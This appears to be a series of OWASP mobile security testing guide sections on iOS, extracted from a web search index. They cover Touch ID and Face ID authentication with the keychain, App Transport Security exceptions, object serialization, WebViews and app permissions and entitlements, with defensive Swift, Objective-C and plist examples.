As stated before in chapter \"Mobile App Authentication Architectures\": The tester should be aware that local authentication should always be enforced at a remote endpoint or based on a cryptographic primitive. Attackers can easily bypass local authentication if no data returns from the authentication process.
A variety of methods are available for integrating local authentication into apps. The Local Authentication framework provides a set of APIs for developers to extend an authentication dialog to a user. In the context of connecting to a remote service, it is possible (and recommended) to leverage the keychain for implementing local authentication.
Fingerprint authentication on iOS is known as Touch ID. The fingerprint ID sensor is operated by the SecureEnclave security coprocessor and does not expose fingerprint data to any other parts of the system. Next to Touch ID, Apple introduced Face ID: which allows authentication based on facial recognition. Both use similar APIs on an application level, but the actual method of storing and retrieving the data (e.g. facial data or fingerprint related data) is different.
Developers have two options for incorporating Touch ID/Face ID authentication:
LocalAuthentication.framework
is a high-level API that can be used to authenticate the user via Touch ID. The app can't access any data associated with the enrolled fingerprint and is notified only whether authentication was successful.Security.framework
is a lower level API to access keychain services. This is a secure option if your app needs to protect some secret data with biometric authentication, since the access control is managed on a system-level and can not easily be bypassed. Security.framework
has a C API, but there are several open source wrappers available, making access to the keychain as simple as to NSUserDefaults. Security.framework
underlies LocalAuthentication.framework
; Apple recommends to default to higher-level APIs whenever possible.Please be aware that using either the LocalAuthentication.framework
or the Security.framework
, will be a control that can be bypassed by an attacker as it does only return a boolean and no data to proceed with. See Don't touch me that way, by David Lindner et al for more details.
The Local Authentication framework provides facilities for requesting a passphrase or Touch ID authentication from users. Developers can display and utilize an authentication prompt by utilizing the function evaluatePolicy
of the LAContext
class.
Two available policies define acceptable forms of authentication:
deviceOwnerAuthentication
(Swift) or LAPolicyDeviceOwnerAuthentication
(Objective-C): When available, the user is prompted to perform Touch ID authentication. If Touch ID is not activated, the device passcode is requested instead. If the device passcode is not enabled, policy evaluation fails.
deviceOwnerAuthenticationWithBiometrics
(Swift) or LAPolicyDeviceOwnerAuthenticationWithBiometrics
(Objective-C): Authentication is restricted to biometrics where the user is prompted for Touch ID.
The evaluatePolicy
function returns a boolean value indicating whether the user has authenticated successfully.
The Apple Developer website offers code samples for both Swift and Objective-C. A typical implementation in Swift looks as follows.
let context = LAContext()\nvar error: NSError?\n\nguard context.canEvaluatePolicy(.deviceOwnerAuthentication, error: &error) else {\n // Could not evaluate policy; look at error and present an appropriate message to user\n}\n\ncontext.evaluatePolicy(.deviceOwnerAuthentication, localizedReason: \"Please, pass authorization to enter this area\") { success, evaluationError in\n guard success else {\n // User did not authenticate successfully, look at evaluationError and take appropriate action\n }\n\n // User authenticated successfully, take appropriate action\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#using-keychain-services-for-local-authentication","title":"Using Keychain Services for Local Authentication","text":"The iOS keychain APIs can (and should) be used to implement local authentication. During this process, the app stores either a secret authentication token or another piece of secret data identifying the user in the keychain. In order to authenticate to a remote service, the user must unlock the keychain using their passphrase or fingerprint to obtain the secret data.
The keychain allows saving items with the special SecAccessControl
attribute, which will allow access to the item from the keychain only after the user has passed Touch ID authentication (or passcode, if such a fallback is allowed by attribute parameters).
In the following example we will save the string \"test_strong_password\" to the keychain. The string can be accessed only on the current device while the passcode is set (kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly
parameter) and after Touch ID authentication for the currently enrolled fingers only (SecAccessControlCreateFlags.biometryCurrentSet
parameter):
// 1. Create the AccessControl object that will represent authentication settings\n\nvar error: Unmanaged<CFError>?\n\nguard let accessControl = SecAccessControlCreateWithFlags(kCFAllocatorDefault,\n kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,\n SecAccessControlCreateFlags.biometryCurrentSet,\n &error) else {\n // failed to create AccessControl object\n\n return\n}\n\n// 2. Create the keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute\n\nvar query: [String: Any] = [:]\n\nquery[kSecClass as String] = kSecClassGenericPassword\nquery[kSecAttrLabel as String] = \"com.me.myapp.password\" as CFString\nquery[kSecAttrAccount as String] = \"OWASP Account\" as CFString\nquery[kSecValueData as String] = \"test_strong_password\".data(using: .utf8)! as CFData\nquery[kSecAttrAccessControl as String] = accessControl\n\n// 3. Save the item\n\nlet status = SecItemAdd(query as CFDictionary, nil)\n\nif status == noErr {\n // successfully saved\n} else {\n // error while saving\n}\n\n// 4. Now we can request the saved item from the keychain. Keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not.\n\n// 5. Create the query\nvar query = [String: Any]()\nquery[kSecClass as String] = kSecClassGenericPassword\nquery[kSecReturnData as String] = kCFBooleanTrue\nquery[kSecAttrAccount as String] = \"My Name\" as CFString\nquery[kSecAttrLabel as String] = \"com.me.myapp.password\" as CFString\nquery[kSecUseOperationPrompt as String] = \"Please, pass authorisation to enter this area\" as CFString\n\n// 6. Get the item\nvar queryResult: AnyObject?\nlet status = withUnsafeMutablePointer(to: &queryResult) {\n SecItemCopyMatching(query as CFDictionary, UnsafeMutablePointer($0))\n}\n\nif status == noErr {\n let password = String(data: queryResult as! 
Data, encoding: .utf8)!\n // successfully received password\n} else {\n // authorization not passed\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#objective-c","title":"Objective-C","text":"// 1. Create the AccessControl object that will represent authentication settings\nCFErrorRef *err = nil;\n\nSecAccessControlRef sacRef = SecAccessControlCreateWithFlags(kCFAllocatorDefault,\n kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly,\n kSecAccessControlUserPresence,\n err);\n\n// 2. Create the keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute\nNSDictionary* query = @{\n (_ _bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,\n (__bridge id)kSecAttrLabel: @\"com.me.myapp.password\",\n (__bridge id)kSecAttrAccount: @\"OWASP Account\",\n (__bridge id)kSecValueData: [@\"test_strong_password\" dataUsingEncoding:NSUTF8StringEncoding],\n (__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacRef\n};\n\n// 3. Save the item\nOSStatus status = SecItemAdd((__bridge CFDictionaryRef)query, nil);\n\nif (status == noErr) {\n // successfully saved\n} else {\n // error while saving\n}\n\n// 4. Now we can request the saved item from the keychain. Keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not.\n\n// 5. Create the query\nNSDictionary *query = @{(__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword,\n (__bridge id)kSecReturnData: @YES,\n (__bridge id)kSecAttrAccount: @\"My Name1\",\n (__bridge id)kSecAttrLabel: @\"com.me.myapp.password\",\n (__bridge id)kSecUseOperationPrompt: @\"Please, pass authorisation to enter this area\" };\n\n// 6. 
Get the item\nCFTypeRef queryResult = NULL;\nOSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, &queryResult);\n\nif (status == noErr){\n NSData* resultData = ( __bridge_transfer NSData* )queryResult;\n NSString* password = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding];\n NSLog(@\"%@\", password);\n} else {\n NSLog(@\"Something went wrong\");\n}\n
"},{"location":"MASTG/iOS/0x06f-Testing-Local-Authentication/#note-regarding-temporariness-of-keys-in-the-keychain","title":"Note regarding temporariness of keys in the Keychain","text":"Unlike macOS and Android, iOS does not support temporariness of an item's accessibility in the keychain: when there is no additional security check when entering the keychain (e.g. kSecAccessControlUserPresence
or similar is set), then once the device is unlocked, a key will be accessible.
Almost every iOS app acts as a client to one or more remote services. As this network communication usually takes place over untrusted networks such as public Wi-Fi, classical network based-attacks become a potential issue.
Most modern mobile apps use variants of HTTP-based web services, as these protocols are well-documented and supported.
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#ios-app-transport-security","title":"iOS App Transport Security","text":"Starting with iOS 9, Apple introduced App Transport Security (ATS) which is a set of security checks enforced by the operating system for connections made using the URL Loading System (typically via URLSession
) to always use HTTPS. Apps should follow Apple's best practices to properly secure their connections.
Watch ATS Introductory Video from the Apple WWDC 2015.
ATS performs default server trust evaluation and requires a minimum set of security requirements.
Default Server Trust Evaluation:
When an app connects to a remote server, the server provides its identity using an X.509 digital certificate. The ATS default server trust evaluation includes validating that the certificate:
Minimum Security Requirements for Connections:
ATS will block connections that further fail to meet a set of minimum security requirements including:
Certificate validity checking:
According to Apple, \"evaluating the trusted status of a TLS certificate is performed in accordance with established industry standards, as set out in RFC 5280, and incorporates emerging standards such as RFC 6962 (Certificate Transparency). In iOS 11 or later, Apple devices are periodically updated with a current list of revoked and constrained certificates. The list is aggregated from certificate revocation lists (CRLs), which are published by each of the built-in root certificate authorities trusted by Apple, as well as by their subordinate CA issuers. The list may also include other constraints at Apple\u2019s discretion. This information is consulted whenever a network API function is used to make a secure connection. If there are too many revoked certificates from a CA to list individually, a trust evaluation may instead require that an online certificate status response (OCSP) is needed, and if the response isn\u2019t available, the trust evaluation will fail.\"
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#when-does-ats-not-apply","title":"When does ATS not apply?","text":"When using lower-level APIs: ATS only applies to the URL Loading System including URLSession and APIs layered on top of them. It does not apply to apps that use lower-level APIs (like BSD Sockets), including those that implement TLS on top of those lower-level APIs (see section \"Using ATS in Apple Frameworks\" from the Archived Apple Developer Documentation).
When connecting to IP addresses, unqualified domain names or local hosts: ATS applies only to connections made to public host names (see section \"Availability of ATS for Remote and Local Connections\" from the Archived Apple Developer Documentation). The system does not provide ATS protection to connections made to:
When including ATS Exceptions: If the app uses the ATS compatible APIs, it can still disable ATS for specific scenarios using ATS Exceptions.
Learn more:
ATS restrictions can be disabled by configuring exceptions in the Info.plist
file under the NSAppTransportSecurity
key. These exceptions can be applied to:
ATS exceptions can be applied globally or per domain basis. The application can globally disable ATS, but opt in for individual domains. The following listing from Apple Developer documentation shows the structure of the NSAppTransportSecurity
dictionary.
NSAppTransportSecurity : Dictionary {\n NSAllowsArbitraryLoads : Boolean\n NSAllowsArbitraryLoadsForMedia : Boolean\n NSAllowsArbitraryLoadsInWebContent : Boolean\n NSAllowsLocalNetworking : Boolean\n NSExceptionDomains : Dictionary {\n <domain-name-string> : Dictionary {\n NSIncludesSubdomains : Boolean\n NSExceptionAllowsInsecureHTTPLoads : Boolean\n NSExceptionMinimumTLSVersion : String\n NSExceptionRequiresForwardSecrecy : Boolean // Default value is YES\n NSRequiresCertificateTransparency : Boolean\n }\n }\n}\n
Source: Apple Developer Documentation.
The following table summarizes the global ATS exceptions. For more information about these exceptions, please refer to table 2 in the official Apple developer documentation.
Key DescriptionNSAllowsArbitraryLoads
Disable ATS restrictions globally excepts for individual domains specified under NSExceptionDomains
NSAllowsArbitraryLoadsInWebContent
Disable ATS restrictions for all the connections made from web views NSAllowsLocalNetworking
Allow connection to unqualified domain names and .local domains NSAllowsArbitraryLoadsForMedia
Disable all ATS restrictions for media loaded through the AV Foundations framework The following table summarizes the per-domain ATS exceptions. For more information about these exceptions, please refer to table 3 in the official Apple developer documentation.
Key DescriptionNSIncludesSubdomains
Indicates whether ATS exceptions should apply to subdomains of the named domain NSExceptionAllowsInsecureHTTPLoads
Allows HTTP connections to the named domain, but does not affect TLS requirements NSExceptionMinimumTLSVersion
Allows connections to servers with TLS versions less than 1.2 NSExceptionRequiresForwardSecrecy
Disable perfect forward secrecy (PFS) Justifying Exceptions:
Starting from January 1 2017, Apple App Store review requires justification if one of the following ATS exceptions are defined.
NSAllowsArbitraryLoads
NSAllowsArbitraryLoadsForMedia
NSAllowsArbitraryLoadsInWebContent
NSExceptionAllowsInsecureHTTPLoads
NSExceptionMinimumTLSVersion
This must be carefully revised to determine if it's indeed part of the app's intended purpose. Apple warns about exceptions reducing the security of the apps and advises to configure exceptions only when needed and prefer server fixes when faced with an ATS failure.
Example:
In the following example, ATS is globally enabled (there's no global NSAllowsArbitraryLoads
defined) but an exception is explicitly set for the example.com
domain (and its subdomains). Considering that the domain is owned by the application developers and there's a proper justification this exception would be acceptable, since it maintains all the benefits of ATS for all other domains. However, it would be always preferable to fix the server as indicated above.
<key>NSAppTransportSecurity</key>\n<dict>\n <key>NSExceptionDomains</key>\n <dict>\n <key>example.com</key>\n <dict>\n <key>NSIncludesSubdomains</key>\n <true/>\n <key>NSExceptionMinimumTLSVersion</key>\n <string>TLSv1.2</string>\n <key>NSExceptionAllowsInsecureHTTPLoads</key>\n <true/>\n <key>NSExceptionRequiresForwardSecrecy</key>\n <true/>\n </dict>\n </dict>\n</dict>\n
For more information on ATS exceptions please consult section \"Configure Exceptions Only When Needed; Prefer Server Fixes\" from the article \"Preventing Insecure Network Connections\" in the Apple Developer Documentation and the blog post on ATS.
"},{"location":"MASTG/iOS/0x06g-Testing-Network-Communication/#server-trust-evaluation","title":"Server Trust Evaluation","text":"ATS imposes extended security checks that supplement the default server trust evaluation prescribed by the Transport Layer Security (TLS) protocol. Loosening ATS restrictions reduces the security of the app. Apps should prefer alternative ways to improve server security before adding ATS exceptions.
The Apple Developer Documentation explains that an app can use URLSession
to automatically handle server trust evaluation. However, apps are also able to customize that process, for example they can:
References:
Since iOS 12.0 the Network framework and the URLSession
class provide methods to load network and URL requests asynchronously and synchronously. Older iOS versions can utilize the Sockets API.
The Network
framework was introduced at The Apple Worldwide Developers Conference (WWDC) in 2018 and is a replacement to the Sockets API. This low-level networking framework provides classes to send and receive data with built in dynamic networking, security and performance support.
TLS 1.3 is enabled by default in the Network
framework, if the argument using: .tls
is used. It is the preferred option over the legacy Secure Transport framework.
URLSession
was built upon the Network
framework and utilizes the same transport services. The class also uses TLS 1.3 by default, if the endpoint is HTTPS.
URLSession
should be used for HTTP and HTTPS connections, instead of utilizing the Network
framework directly. The URLSession
class natively supports both URL schemes and is optimized for such connections. It requires less boilerplate code, reducing the possibility for errors and ensuring secure connections by default. The Network
framework should only be used when there are low-level and/or advanced networking requirements.
The official Apple documentation includes examples of using the Network
framework to implement netcat and URLSession
to fetch website data into memory.
Enforced updating can be helpful when it comes to public key pinning (see the Testing Network communication for more details) when a pin has to be refreshed due to a certificate/public key rotation. Additionally, vulnerabilities are easily patched by means of forced updates.
The challenge with iOS however, is that Apple does not provide any APIs yet to automate this process, instead, developers will have to create their own mechanism, such as described at various blogs which boil down to looking up properties of the app using http://itunes.apple.com/lookup\\?id\\<BundleId>
or third party libraries, such as Siren and react-native-appstore-version-checker. Most of these implementations will require a certain given version offered by an API or just \"latest in the appstore\", which means users can be frustrated with having to update the app, even though no business/security need for an update is truly there.
Please note that newer versions of an application will not fix security issues that are living in the backends to which the app communicates. Allowing an app not to communicate with it might not be enough. Having proper API-lifecycle management is key here. Similarly, when a user is not forced to update, do not forget to test older versions of your app against your API and/or use proper API versioning.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence","title":"Object Persistence","text":"There are several ways to persist an object on iOS:
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-encoding","title":"Object Encoding","text":"iOS comes with two protocols for object encoding and decoding for Objective-C or NSObject
s: NSCoding
and NSSecureCoding
. When a class conforms to either of the protocols, the data is serialized to NSData
: a wrapper for byte buffers. Note that Data
in Swift is the same as NSData
or its mutable counterpart: NSMutableData
. The NSCoding
protocol declares the two methods that must be implemented in order to encode/decode its instance-variables. A class using NSCoding
needs to implement NSObject
or be annotated as an @objc class. The NSCoding
protocol requires to implement encode and init as shown below.
class CustomPoint: NSObject, NSCoding {\n\n //required by NSCoding:\n func encode(with aCoder: NSCoder) {\n aCoder.encode(x, forKey: \"x\")\n aCoder.encode(name, forKey: \"name\")\n }\n\n var x: Double = 0.0\n var name: String = \"\"\n\n init(x: Double, name: String) {\n self.x = x\n self.name = name\n }\n\n // required by NSCoding: initialize members using a decoder.\n required convenience init?(coder aDecoder: NSCoder) {\n guard let name = aDecoder.decodeObject(forKey: \"name\") as? String\n else {return nil}\n self.init(x:aDecoder.decodeDouble(forKey:\"x\"),\n name:name)\n }\n\n //getters/setters/etc.\n}\n
The issue with NSCoding
is that the object is often already constructed and inserted before you can evaluate the class-type. This allows an attacker to easily inject all sorts of data. Therefore, the NSSecureCoding
protocol has been introduced. When conforming to NSSecureCoding
you need to include:
static var supportsSecureCoding: Bool {\n return true\n}\n
when init(coder:)
is part of the class. Next, when decoding the object, a check should be made, e.g.:
let obj = decoder.decodeObject(of:MyClass.self, forKey: \"myKey\")\n
The conformance to NSSecureCoding
ensures that objects being instantiated are indeed the ones that were expected. However, there are no additional integrity checks done over the data and the data is not encrypted. Therefore, any secret data needs additional encryption and data of which the integrity must be protected, should get an additional HMAC.
Note, when NSData
(Objective-C) or the keyword let
(Swift) is used: then the data is immutable in memory and cannot be easily removed.
NSKeyedArchiver
is a concrete subclass of NSCoder
and provides a way to encode objects and store them in a file. The NSKeyedUnarchiver
decodes the data and recreates the original data. Let's take the example of the NSCoding
section and now archive and unarchive them:
// archiving:\nNSKeyedArchiver.archiveRootObject(customPoint, toFile: \"/path/to/archive\")\n\n// unarchiving:\nguard let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile(\"/path/to/archive\") as?\n CustomPoint else { return nil }\n
When decoding a keyed archive, because values are requested by name, values can be decoded out of sequence or not at all. Keyed archives, therefore, provide better support for forward and backward compatibility. This means that an archive on disk could actually contain additional data which is not detected by the program, unless the key for that given data is provided at a later stage.
Note that additional protection needs to be in place to secure the file in case of confidential data, as the data is not encrypted within the file. See the chapter \"Data Storage on iOS\" for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#codable","title":"Codable","text":"With Swift 4, the Codable
type alias arrived: it is a combination of the Decodable
and Encodable
protocols. A String
, Int
, Double
, Date
, Data
and URL
are Codable
by nature: meaning they can easily be encoded and decoded without any additional work. Let's take the following example:
struct CustomPointStruct:Codable {\n var x: Double\n var name: String\n}\n
By adding Codable
to the inheritance list for the CustomPointStruct
in the example, the methods init(from:)
and encode(to:)
are automatically supported. Fore more details about the workings of Codable
check the Apple Developer Documentation. The Codable
s can easily be encoded / decoded into various representations: NSData
using NSCoding
/NSSecureCoding
, JSON, Property Lists, XML, etc. See the subsections below for more details.
There are various ways to encode and decode JSON within iOS by using different 3rd party libraries:
The libraries differ in their support for certain versions of Swift and Objective-C, whether they return (im)mutable results, speed, memory consumption and actual library size. Again, note in case of immutability: confidential information cannot be removed from memory easily.
Next, Apple provides support for JSON encoding/decoding directly by combining Codable
together with a JSONEncoder
and a JSONDecoder
:
struct CustomPointStruct: Codable {\n var point: Double\n var name: String\n}\n\nlet encoder = JSONEncoder()\nencoder.outputFormatting = .prettyPrinted\n\nlet test = CustomPointStruct(point: 10, name: \"test\")\nlet data = try encoder.encode(test)\nlet stringData = String(data: data, encoding: .utf8)\n\n// stringData = Optional ({\n// \"point\" : 10,\n// \"name\" : \"test\"\n// })\n
JSON itself can be stored anywhere, e.g., a (NoSQL) database or a file. You just need to make sure that any JSON that contains secrets has been appropriately protected (e.g., encrypted/HMACed). See the chapter \"Data Storage on iOS\" for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#property-lists-and-codable","title":"Property Lists and Codable","text":"You can persist objects to property lists (also called plists in previous sections). You can find two examples below of how to use it:
// archiving:\nlet data = NSKeyedArchiver.archivedDataWithRootObject(customPoint)\nNSUserDefaults.standardUserDefaults().setObject(data, forKey: \"customPoint\")\n\n// unarchiving:\n\nif let data = NSUserDefaults.standardUserDefaults().objectForKey(\"customPoint\") as? NSData {\n let customPoint = NSKeyedUnarchiver.unarchiveObjectWithData(data)\n}\n
In this first example, the NSUserDefaults
are used, which is the primary property list. We can do the same with the Codable
version:
struct CustomPointStruct: Codable {\n var point: Double\n var name: String\n }\n\n var points: [CustomPointStruct] = [\n CustomPointStruct(point: 1, name: \"test\"),\n CustomPointStruct(point: 2, name: \"test\"),\n CustomPointStruct(point: 3, name: \"test\"),\n ]\n\n UserDefaults.standard.set(try? PropertyListEncoder().encode(points), forKey: \"points\")\n if let data = UserDefaults.standard.value(forKey: \"points\") as? Data {\n let points2 = try? PropertyListDecoder().decode([CustomPointStruct].self, from: data)\n }\n
Note that plist
files are not meant to store secret information. They are designed to hold user preferences for an app.
There are multiple ways to do XML encoding. Similar to JSON parsing, there are various third party libraries, such as:
They vary in terms of speed, memory usage, object persistence and more important: differ in how they handle XML external entities. See XXE in the Apple iOS Office viewer as an example. Therefore, it is key to disable external entity parsing if possible. See the OWASP XXE prevention cheatsheet for more details. Next to the libraries, you can make use of Apple's XMLParser
class
When not using third party libraries, but Apple's XMLParser
, be sure to let shouldResolveExternalEntities
return false
.
There are various ORM-like solutions for iOS. The first one is Realm, which comes with its own storage engine. Realm has settings to encrypt the data as explained in Realm's documentation. This allows for handling secure data. Note that the encryption is turned off by default.
Apple itself supplies CoreData
, which is well explained in the Apple Developer Documentation. It supports various storage backends as described in Apple's Persistent Store Types and Behaviors documentation. The issue with the storage backends recommended by Apple is that none of these data store types is encrypted, nor checked for integrity. Therefore, additional actions are necessary in case of confidential data. An alternative can be found in project iMas, which does supply out of the box encryption.
Protocol Buffers by Google, are a platform- and language-neutral mechanism for serializing structured data by means of the Binary Data Format. They are available for iOS by means of the Protobuf library. There have been a few vulnerabilities with Protocol Buffers, such as CVE-2015-5237. Note that Protocol Buffers do not provide any protection for confidentiality as no built-in encryption is available.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#webviews","title":"WebViews","text":"WebViews are in-app browser components for displaying interactive web content. They can be used to embed web content directly into an app's user interface. iOS WebViews support JavaScript execution by default, so script injection and Cross-Site Scripting attacks can affect them.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#types-of-webviews","title":"Types of WebViews","text":"There are multiple ways to include a WebView in an iOS application:
UIWebView
WKWebView
SFSafariViewController
UIWebView
is deprecated starting on iOS 12 and should not be used. Make sure that either WKWebView
or SFSafariViewController
are used to embed web content. In addition to that, JavaScript cannot be disabled for UIWebView
which is another reason to refrain from using it.
WKWebView
was introduced with iOS 8 and is the appropriate choice for extending app functionality, controlling displayed content (i.e., prevent the user from navigating to arbitrary URLs) and customizing.
WKWebView
comes with several security advantages over UIWebView
:
javaScriptEnabled
property of WKWebView
, it can be completely disabled, preventing all script injection flaws.JavaScriptCanOpenWindowsAutomatically
can be used to prevent JavaScript from opening new windows, such as pop-ups.hasOnlySecureContent
property can be used to verify resources loaded by the WebView are retrieved through encrypted connections.WKWebView
implements out-of-process rendering, so memory corruption bugs won't affect the main app process.A JavaScript Bridge can be enabled when using WKWebView
and UIWebView
. See Section \"Native Functionality Exposed Through WebViews\" below for more information.
SFSafariViewController
is available starting on iOS 9 and should be used to provide a generalized web viewing experience. These WebViews can be easily spotted as they have a characteristic layout which includes the following elements:
There are a couple of things to consider:
SFSafariViewController
and this is one of the reasons why the usage of WKWebView
is recommended when the goal is extending the app's user interface.SFSafariViewController
also shares cookies and other website data with Safari.SFSafariViewController
are not visible to the app, which cannot access AutoFill data, browsing history, or website data.SFSafariViewController
s may not be hidden or obscured by other views or layers.This should be sufficient for an app analysis and therefore, SFSafariViewController
s are out of scope for the Static and Dynamic Analysis sections.
Enabling Safari web inspection on iOS allows you to inspect the contents of a WebView remotely from a macOS device. By default, you can view the contents of any page loaded into the Safari app because the Safari app has the get-task-allowed
entitlement. Applications installed from the App store will however not have this entitlement, and so cannot be attached to. On jailbroken devices, this entitlement can be added to any application by installing the Inspectorplus tweak from the BigBoss repo.
Enabling the Safari Web Inspector is especially interesting in applications that expose native APIs using a JavaScript bridge, for example in hybrid applications.
To activate the web inspection you have to follow these steps:
To open the web inspector and debug a WebView:
Now you're able to debug the WebView as you would with a regular web page on your desktop browser.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#native-functionality-exposed-through-webviews","title":"Native Functionality Exposed Through WebViews","text":"In iOS 7, Apple introduced APIs that allow communication between the JavaScript runtime in the WebView and the native Swift or Objective-C objects. If these APIs are used carelessly, important functionality might be exposed to attackers who manage to inject malicious scripts into the WebView (e.g., through a successful Cross-Site Scripting attack).
Both UIWebView
and WKWebView
provide a means of communication between the WebView and the native app. Any important data or native functionality exposed to the WebView JavaScript engine would also be accessible to rogue JavaScript running in the WebView.
UIWebView:
There are two fundamental ways of how native code and JavaScript can communicate:
JSContext
, JavaScriptCore automatically wraps the block in a JavaScript function.JSExport
-inherited protocol are mapped to JavaScript objects that are available to all JavaScript code. Modifications of objects that are in the JavaScript environment are reflected in the native environment.Note that only class members defined in the JSExport
protocol are made accessible to JavaScript code.
WKWebView:
JavaScript code in a WKWebView
can still send messages back to the native app but in contrast to UIWebView
, it is not possible to directly reference the JSContext
of a WKWebView
. Instead, communication is implemented using a messaging system and using the postMessage
function, which automatically serializes JavaScript objects into native Objective-C or Swift objects. Message handlers are configured using the method add(_ scriptMessageHandler:name:)
.
In contrast to Android, where each app runs on its own user ID, iOS makes all third-party apps run under the non-privileged mobile
user. Each app has a unique home directory and is sandboxed, so that they cannot access protected system resources or files stored by the system or by other apps. These restrictions are implemented via sandbox policies (aka. profiles), which are enforced by the Trusted BSD (MAC) Mandatory Access Control Framework via a kernel extension. iOS applies a generic sandbox profile to all third-party apps called container. Access to protected resources or data (some also known as app capabilities) is possible, but it's strictly controlled via special permissions known as entitlements.
Some permissions can be configured by the app's developers (e.g. Data Protection or Keychain Sharing) and will directly take effect after the installation. However, for others, the user will be explicitly asked the first time the app attempts to access a protected resource, for example:
Even though Apple urges to protect the privacy of the user and to be very clear on how to ask permissions, it can still be the case that an app requests too many of them for non-obvious reasons.
Verifying the use of some permissions such as Camera, Photos, Calendar Data, Motion, Contacts or Speech Recognition should be pretty straightforward as it should be obvious if the app requires them to fulfill its tasks. Let's consider the following examples regarding the Photos permission, which, if granted, gives the app access to all user photos in the \"Camera Roll\" (the iOS default system-wide location for storing photos):
UIImagePickerController
(iOS 11+) and its modern replacement PHPickerViewController
(iOS 14+). These APIs run on a separate process from your app and by using them, the app gets read-only access exclusively to the images selected by the user instead of to the whole \"Camera Roll\". This is considered a best practice to avoid requesting unnecessary permissions.Verifying other permissions like Bluetooth or Location require a deeper source code inspection. They may be required for the app to properly function but the data being handled by those tasks might not be properly protected.
When collecting or simply handling (e.g. caching) sensitive data, an app should provide proper mechanisms to give the user control over it, e.g. to be able to revoke access or to delete it. However, sensitive data might not only be stored or cached but also sent over the network. In both cases, it has to be ensured that the app properly follows the appropriate best practices, which in this case involve implementing proper data protection and transport security. More information on how to protect this kind of data can be found in the chapter \"Network APIs\".
As you can see, using app capabilities and permissions mostly involve handling personal data, therefore being a matter of protecting the user's privacy. See the articles \"Protecting the User's Privacy\" and \"Accessing Protected Resources\" in Apple Developer Documentation for more details.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#device-capabilities","title":"Device Capabilities","text":"Device capabilities are used by the App Store to ensure that only compatible devices are listed and therefore are allowed to download the app. They are specified in the Info.plist
file of the app under the UIRequiredDeviceCapabilities
key.
<key>UIRequiredDeviceCapabilities</key>\n<array>\n <string>arm64</string>\n</array>\n
Typically you'll find the arm64
capability, meaning that the app is compiled for the arm64 instruction set.
For example, an app might be completely dependent on NFC to work (e.g. a \"NFC Tag Reader\" app). According to the archived iOS Device Compatibility Reference, NFC is only available starting on the iPhone 7 (and iOS 11). A developer might want to exclude all incompatible devices by setting the nfc
device capability.
Regarding testing, you can consider UIRequiredDeviceCapabilities
as a mere indication that the app is using some specific resources. Unlike the entitlements related to app capabilities, device capabilities do not confer any right or access to protected resources. Additional configuration steps might be required for that, which are very specific to each capability.
For example, if BLE is a core feature of the app, Apple's Core Bluetooth Programming Guide explains the different things to be considered:
bluetooth-le
device capability can be set in order to restrict non-BLE capable devices from downloading their app.bluetooth-peripheral
or bluetooth-central
(both UIBackgroundModes
) should be added if BLE background processing is required.However, this is not yet enough for the app to get access to the Bluetooth peripheral, the NSBluetoothPeripheralUsageDescription
key has to be included in the Info.plist
file, meaning that the user has to actively give permission. See \"Purpose Strings in the Info.plist File\" below for more information.
According to Apple's iOS Security Guide:
Entitlements are key value pairs that are signed in to an app and allow authentication beyond runtime factors, like UNIX user ID. Since entitlements are digitally signed, they can\u2019t be changed. Entitlements are used extensively by system apps and daemons to perform specific privileged operations that would otherwise require the process to run as root. This greatly reduces the potential for privilege escalation by a compromised system app or daemon.
Many entitlements can be set using the \"Summary\" tab of the Xcode target editor. Other entitlements require editing a target\u2019s entitlements property list file or are inherited from the iOS provisioning profile used to run the app.
Entitlement Sources:
Entitlement Destinations:
The Apple Developer Documentation also explains:
embedded.mobileprovision
).For example, if you want to set the \"Default Data Protection\" capability, you would need to go to the Capabilities tab in Xcode and enable Data Protection. This is directly written by Xcode to the <appname>.entitlements
file as the com.apple.developer.default-data-protection
entitlement with default value NSFileProtectionComplete
. In the IPA we might find this in the embedded.mobileprovision
as:
<key>Entitlements</key>\n<dict>\n ...\n <key>com.apple.developer.default-data-protection</key>\n <string>NSFileProtectionComplete</string>\n</dict>\n
For other capabilities such as HealthKit, the user has to be asked for permission, therefore it is not enough to add the entitlements, special keys and strings have to be added to the Info.plist
file of the app.
Purpose strings or _usage description strings_ are custom texts that are offered to users in the system's permission request alert when requesting permission to access protected data or resources.
If linking on or after iOS 10, developers are required to include purpose strings in their app's Info.plist
file. Otherwise, if the app attempts to access protected data or resources without having provided the corresponding purpose string, the access will fail and the app might even crash.
For an overview of the different purpose strings Info.plist keys available see Table 1-2 at the Apple App Programming Guide for iOS. Click on the provided links to see the full description of each key in the CocoaKeys reference.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#code-signing-entitlements-file","title":"Code Signing Entitlements File","text":"Certain capabilities require a code signing entitlements file (<appname>.entitlements
). It is automatically generated by Xcode but may be manually edited and/or extended by the developer as well.
Here is an example of entitlements file of the open source app Telegram including the App Groups entitlement (application-groups
):
